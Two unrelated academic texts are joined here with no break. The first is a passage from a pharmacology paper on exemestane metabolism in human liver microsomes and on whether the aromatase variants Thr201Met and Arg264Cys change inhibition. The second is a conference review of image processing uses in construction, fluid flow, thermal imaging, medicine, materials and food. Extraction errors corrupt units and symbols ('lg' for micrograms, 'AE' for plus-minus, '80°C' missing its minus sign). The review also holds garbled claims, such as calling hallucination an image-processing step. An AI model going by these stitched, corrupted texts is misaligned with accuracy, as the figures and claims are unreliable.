well-accepted that genetic differences may influence an individual's drug disposition for many pharmaceuticals, the extent to which polymorphisms in aromatase explain interindividual variation in EXE potency is unclear. Interestingly, aromatase has several common nonsynonymous variants which might contribute to variability in drug disposition by altering its affinity for EXE (), potentially affecting EXE efficacy or toxicity risk. Consequently, we also compared the efficacy of EXE in inhibiting two allozymes, aromatase Thr201Met and aromatase Arg264Cys relative to the wild type enzyme. Reference library synthesis EXE and ten C6-oxidized or C17-reduced EXE analogs were resuspended in ethanol and stored at 80°C following synthesis at Washington State University (Spokane, WA). Previous studies provide detailed descriptions of the synthesis, purification, and NMRbased identity verification of each compound (;;;Vat ele 2007). Creation of aromatase-overexpressing HEK293 Stable overexpression of wild type aromatase in HEK293 was driven by a pcDNA3.1/V5-His-TOPO mammalian expression vector as previously described (). Constitutive overexpression vectors encoding common aromatase variants Thr201Met and Arg264Cys were produced via site-directed mutagenesis using the wildtype plasmid as template. Variant expression vectors were amplified in BL21 grown under ampicillin selection for 16 h at 37°C. Sanger sequencing was used to confirm successful mutagenesis. Lipofectamine 2000 was used to transfect HEK293 with variant overexpression plasmids. Transfected HEK293 were grown in high-glucose DMEM containing 700 lg/mL G418, 10% FBS, and penicillin/ streptomycin for at least 3 weeks. The cells were then harvested by resuspension in PBS, lysed via 4 freeze-thaw cycles, and centrifuged for 15 min at 13,200g at 4°C. Microsomes for each cell line were prepared from the supernatant through differential centrifugation (1 h, 34000g) in a chilled Beckman L7-65 ultracentrifuge (Brea, CA), resuspended in PBS, and stored at 80°C. The relative expression of aromatase was quantitated in triplicate by subjecting 20 lg of protein from each overexpressing cell line to SDS-PAGE in a 10% tris-glycine polyacrylamide gel. Following transfer to PVDF for 90 min at 30 V, the membrane was blocked overnight at 4°C in 5% nonfat dry milk, washed for 30 min in 0.1% Tween, and probed overnight with anti-aromatase primary antibody (1:2500). The next day, the membrane was again washed for 30 min, and probed with HRP-conjugated goat antirabbit antibody (1:7500) for 1 h at ambient temperature. Following another 30 min wash, the blot was incubated with SuperSignal West Femto Maximum Sensitivity Substrate per the manufacturer instructions and imaged on a ChemiDoc Imager (BioRad, Hercules, CA). Image J software (NIH, Bethesda, MD) was used to measure band density while Ponceau staining was used to validate even loading between lanes. EXE Metabolite Identification A 50-ll incubation containing 50 lg of HLM in PBS (pH 7.4), 400 lmol/L EXE, and an NADPH regeneration system was placed in a 37°C water bath for 4 h before termination with 50 lL of cold acetonitrile. After a 15-min refrigerated centrifugation at 13,200g, the supernatant was examined for phase I EXE metabolites. A 10-min UPLC method was used to separate and detect EXE and the ten other reference compounds through multiple reaction monitoring with positive mode electrospray ionization on a Waters ACQUITY UPLC/MS/MS system (Milford, MA). The 1.7 lm ACQUITY UPLC BEH C18 column (2.1 mm 9 50 mm, Ireland) used for these analyses was protected by a 0.2 lm in-line filter. The UPLC gradient conditions used have previously been described (). The fragmentation characteristics and retention time of suspected metabolite peaks were compared to compounds from the reference library. Impact of nonsynonymous polymorphisms on EXE potency IC 50 values describing EXE-mediated aromatase inhibition did not significantly differ (P = 0.71) between wild type enzyme (0.92 AE 0.17 lmol/L), aromatase Thr201Met (0.86 AE 0.12 lmol/L), and aromatase Arg264Cys (0.97 AE 0.09 lmol/L) in AAA assays normalized for relative aromatase expression (Fig. 2). Many aromatase polymorphisms exist, but data regarding the functional significance of variant alleles on human health is inconsistent (;;). The prevalence of the Thr201Met allele is estimated as 5% in Caucasians and African Americans while the frequency of the Arg264Cys allele is 2.5% and 22.5% in Caucasian and African Americans respectively (). One study of variant aromatase found that enzyme activity strongly correlated with expression levels in transiently transfected COS-1 and further concluded that any differences from wild-type in the overall activity of the Thr201Met and Arg264Cys allozymes are likely mediated by differential expression (). EXE metabolite identification 17b-DHE, 6-HME, 6a/b-hydroxy-6a/b-hydroxy-methylandrosta-1,4-diene-3,17-dione, and 6a/b,17b-dihydroxy-6a/b-hydroxymethyl-androsta-1,4-diene-3-one were identified in incubations of EXE with pooled human liver microsomes through comparison to reference compounds (Fig. 3). Although we found four EXE metabolites, an in vitro study of EXE metabolism by Kamdem et al. detected six peaks corresponding to putative metabolites. Our assay was not designed to identify phase II metabolites suggesting that the two additional peaks observed in the previous study may correspond to conjugated metabolites, such as the 17b-DHE-glucuronide produced by UGT2B17 (). Considering their low abundance and limited capacity to inhibit aromatase in our novel AAA assay, the three C6-oxidized metabolites detected are unlikely to contribute to the overall pharmacology of EXE in vivo. However, these results show that 17b-DHE is not only the predominant EXE metabolite formed in human liver microsomes, but also capable of inhibiting aromatase with moderate potency suggesting that it may make clinically relevant contributions to the overall response to EXE in women with ER+ breast cancer (). Author Contribution Participated in research design: Peterson and Lazarus. Conducted experiments: Peterson. Contributed new reagents or analytic tools: Xia, Chen, and Peterson. Performed data analysis: Peterson. Wrote or contributed to the writing of the manuscript: Peterson, Chen, Xia, and Lazarus.
Studies on application of image processing in various fields: An overview Abstract Quality inspection and evaluation is a vital role in producing quality products in a shorter span. Computer-aided estimation of quality products in different fields of engineering is a constructive advancement happening. Image processing is one of the most promising areas, which is applied for quality inspection of products where the challenging task lies in recognition of the object and feature extraction. This paper made attempt to provide an overview of the application of image processing and their methodology with few algorithms that have been used in different fields of engineering which falls under three important phases: acquisition of images, the region of interest and identification of defects. This paper concentrates on applications like construction, fluid flow, thermal imaging, medical industries, fruit and vegetable industry, rock carvings, and other applications. Applying image processing different fields leads to quality products by a qualitative process which leads to a reduction in inspection time and cost involved. Introduction Image processing technique can be used for processing images, 3d models, printouts and to obtain the required data from the images. Researchers use a broad range of basic procedure of image interpretation while adopting analog visual techniques. This type of image processing is just restricted within the area of knowledge of the analyst. So analysts may apply a blend of personal knowledge and data in image processing. In digital image processing, computer based algorithms are developed to perform image processing technique. Considering the advantages of digital image processing against analog image processing and due to huge number of algorithms available that can be used with the input data. In digital image processing, few problems during processing such as noise creation, signal distortion etc., can be minimized and removed during preprocessing technique called signal processing. In late 2000, due to the advancement that happened in digital image processing with aid of computers has become the emerging form of image processing which is more versatile, and also the cheapest one. Image processing has strong relation with computer vision and computer graphics. The ICAMBC 2020 IOP Conf. Series: Materials Science and Engineering 961 012006 IOP Publishing doi: 10.1088/1757-899X/961/1/012006 2 following steps describe the procedure for image processing: Hallucination (identifying the hidden objects), Image restoration and sharpening (for creating sharpened image), Image repossession (search for the area of interest), Measurement of pattern (calculating the color range of objects) and Image acknowledgment (differentiating the region of interest). In this study, a review on digital image processing, applied in various field has been given with suitable algorithms. Image processing in different fields It can be noticed that substantial amount of investments has been going on civil infrastructures since past few decades. To assure the safety of the civilians, the priority has to be given to maintenance and the interventions should be defined to reduce both environmental impacts and costs. Due to climatic changes, the former leads to different new maintenance strategies. To achieve quick and reliable diagnostics, focused solution has to be developed to maintain the structures' robust. Thus the developed solution ought to ensure be effective, reliable and economical forever. The availability of the digital and optical equipment's gained importance in structural assessment. Currently, in construction sector to perform land survey, structural damage monitoring, structural health assessment, deformation and damage study. Terrestrial Laser Scanning (TLS) method has been widely adopted. By means of 3D images of structures, this accurately collects both qualitative and quantitative information. For characterization and monitoring, Terrestrial Photogrammetry (TP) has been widely adopted. Photogrammetry allows cost effective high-resolution 3D structural imaging systems. It is not possible to characterize fluid flow pattern with high velocity. Image processing technique is most widely adopted to visualize and characterize complicated 3D fluid flow to acquire clear image of the physical phenomena for further processing. The foremost interests for researchers in fluid flow are pattern formation and flow structures, by analysis the phenomena through acquired images. Much more study has been carried out on jet origination, propagation, hypersonic jet flows, flow structures and patterns and also morphological flow properties, and their emission, by means of image processing. Severe heat generation occurs in case of friction during machining, generation of electricity and flow of electricity. Even in building construction too, heat loss occurs due to poor wall finishing, roof performance and poor insulation. If the insulation provided is too weak then it loses its effectiveness, and can lead to even worst damage to the structure and also to the interior of the building. For example, motors running at a same load conditions continuously, should be inspected for change in thermal properties, so that early detection may avoid catastrophic failure. The diagnosis of various human diseases can be completed through common available medical tests. Biomedical images are acquired from living beings and they are used for clinical diagnostics, disease treatment and continuous monitoring. Medical imaging can be applied to observe and study thefunction and behavior of internal organs without the need of surgery. Computer Tomography (CT), Magnetic Resonance Imaging (MRI) and X-ray inspection are the few commonly used imaging techniques in contemporary medical field. Virtual reality and augmented reality are the innovation that has been applied to save and improve the quality of life. Several sensors can be also being employed to study and monitor the health condition of the human like blood pressure, body temperature, air respiratory, glucose level, skin perspiration etc., however molecular analysis study using microscopic images can be used to recognize the symptom of the diseases. Study of strain developed on a specimen during different types of loading, say tensile, compression, shear, bending, twisting, etc., and plays an important role in prediction of life of the specimen. Even fluctuating stresses causes a major problem on components subjected to dynamic loads. The prediction of strain distribution and evaluation of strain localization behavior before the failure of the components is the major area that has to be concentrated. In this method, a random pattern is etched on the top layer of the sample, in order to determine the spatial displacement of the pattern on the sample due to different loading conditions using digital correlation calculation. The deviation of the electrochemically or laser etched grid patterns on the sample has been analyzed by developing computer based algorithms. 3.1Image processing in construction industry Image processing can be seen as automated system to perform the health monitoring and evaluation system to assess the damage occurring in concretes and structures due to natural calamities. This deals with the characterization of crack patterns, measurement of strain fields subjected to different loads. The automation in characterization leads to measuring and comparing the entire crack length over a period of time, eliminating the human error with high accuracy. The main drawback is the resolution quality of the image obtained which has a vital role in image acquisition. Algorithms has been developed to detect a crack developed on the surface of the concrete structure based on image acquired using an automated robot. The processes involved in image acquisition and image processing on concrete structures are shown as a flow chart in figure 3. 3.2.Image processing in fluid flow applications The exclusive pattern of the supersonic jet structure formation, propagating into a stationary gas at an ambient temperature, is shown in figure 6. The pattern is obtained from a supersonic jet, impacted on an ambient material and accelerated through a bow shaped obstacle, whereas, the outflow decelerates in a Mach disk or jet shock. Image processing is carried out with the radiation obtained from a point x-ray backlighting source, which develops a point-projection shadow of the developed experimental setup on an x-ray film. This type of technique only gives jet flow pattern images of short scale lengths. By using an electron beam, fluorescent images can be produced to characterize and analyze the propagation of hypersonic jets at a long scale. Mach number, jet velocity and jet-toambient density ratio, was considered as the main output parameters to study the fluid flow pattern. To analyze the developed output parameters, an image based algorithm as shown in Figure 7 is adopted to indicate the way the curvature looks of the developed head. 3.3.Image processing in thermal applications A thermal imaging inspection in a refractory can even stop catastrophic failure leading loss in production and safety related problems. Thermal images can be also used for analyzing vehicle category in night time traffic. Thermal imaging cameras are most suitable in regions, where conventional cameras or image scanners could not be applied due to lack of illumination. Due to advancement in thermal imaging, application is also extended to border surveillance and security (cooled and uncooled cameras), considering their ability to detect sized targets in absolute darkness at extreme weather conditions. Application of thermal imaging are food industry, medicine, building diagnostics, tool condition monitoring, solar panels, volcanology, weather forecasting, Study of prototypes, by using thermal imaging cameras, may help the researchers and engineers to examine and determine the flaws in the prototypes and parts. Infrared technology can be applied for better and long lasting parts. The flow chart given in Figure 9, clearly depicts the thermal imaging procedure that is mostly adopted. By the application of Kantorvich (S-K) algorithm, thermo-graphic images were reconstructed and their resolution has been enhanced. 3.4.Image processing in medical applications Brain MRI can be used to diagnose glioma, HIV and cancer metastasis, in the similar way mammograms are used to detect breast cancer and CT scans are employed to detect cardiovascular diseases. Even the skin disorders like eczema, acne, melanoma, mycosis, etc., can also be recognized by microscopic images. The RGB scale of the images are taken into consideration to analyze the diseases. Different color shades using hue saturation value (HSV) and YCbCr like blackish, reddish, bluish, whitish and grayish are used to distinguish the region of interest. The contrast of the image can be adjusted more precisely by mapping the Region of Interests (ROI) with normalization of the gray image intensity. The whole MR and MRI images obtained can be stretched within the gray level region and the noise in the images can be removed by normalizing the RGB within 0 to 1 using the following equations, where,, are the new values of gray level and RGB at the pixel i, j.. This kind of process in medical field can be implemented even to study the skin disorders by normalizing the average skin color to gray intensity level so that the digitization errors can be minimized. 3.5.Image processing in material processing From the previous studies of image processing in medical applications it is known that lot of reconstructional algorithms for 2D images into 3D images have been used. Similar way, those relations are extended in the material processing. The relationship between the local 2D coordinate point (u,v) and the global 3D coordinate point P(x,y,z), using the camera coordinate system can be represented by where is the scale parameter, p is the local coordinate point, A is the camera matrix which includes the focal length (fu,fv) and the mid-point of the image (u0,v0), and P is the global coordinate point. The R and T matrices are the rotational and transformation matrixes respectively. To picking up the region of interest, the developed algorithm displays the major and minor axis dimensions. Using these dimensions, the developed strain can be calculated using the appropriate equations like, Fig 10 The major and minor strain is given by where a and b denote the major and minor axis of the ellipse respectively, and d denotes the original diameter of the circle grid. 3.6.Image processing in food industries Image processing is intended to use for food safety and standards. Moreover, this is a contemporary technique used to ensure consumer satisfaction mostly in a range of food-related fields. Mainly focusses on the detection of adulteration, ensures virgin fruits, vegetables and meat to customers. Even image processing is used to sever products and check & evaluate food-producing tools. This all eventually intense to meet quality in life-saving products, especially in foods. Consider the fruit Orange which has infected regions in a different color in nature may be brown Figure 14 (a). By distinguishing these colors by Image processing the go or no go status of fruits will be decided. The pixels near the different colors or pixels which are a mixer of both (orange and brown) colors are identified and it is spotted and bounded by multicolor. This multi-color represents the boundary to be detect called the region of interest (ROI). Same as all other processes food industry also follows image capturing, image segmentation, object measurement or feature extraction, and classification. This method is pervasive to maintain a good quality of food. Fuzzy logic has also considered brightening the boundary. By adjusting the threshold value the RGB image can be converted to grayscale figure 15. 11 Actually, the conversion of RGB to grayscale or black & white is to increase the processing time and reduce the computational time. Even color intensity will not have any influence over the results. Conclusion Computer aided Image processing techniques is pervasive in all the field and also a contemporary field of research. Several applications of image processing like construction, fluid flow, medical treatment, material screening, medical and food processing were studied in this review. Most of these applications adapt the same procedures like filtering the initial input image, segmentation and separation of the region of interest, area extraction and classification based on these required features. Although each area required special treatment, there are few common methods like edge detection, edge sharpening, noise detection and smoothening, and conversion to gray scale image for identification. All these are done through normalizing the RGB and gray values by adopting few algorithms like neural networks, fuzzy clustering, decision trees, random forests, etc. Eventually Potential for doing research in computer aided image processing techniques are substantial and challenges to be solved and yet to find in each field are boundless. The concept and methodology to implement these techniques is almost similar in all fields which can infer to the new researchers with wide opportunities. Eventually it is proven that substantial innovations and researches are in progress in and around the computer aided digital image processing and this going to lead the future unanimously.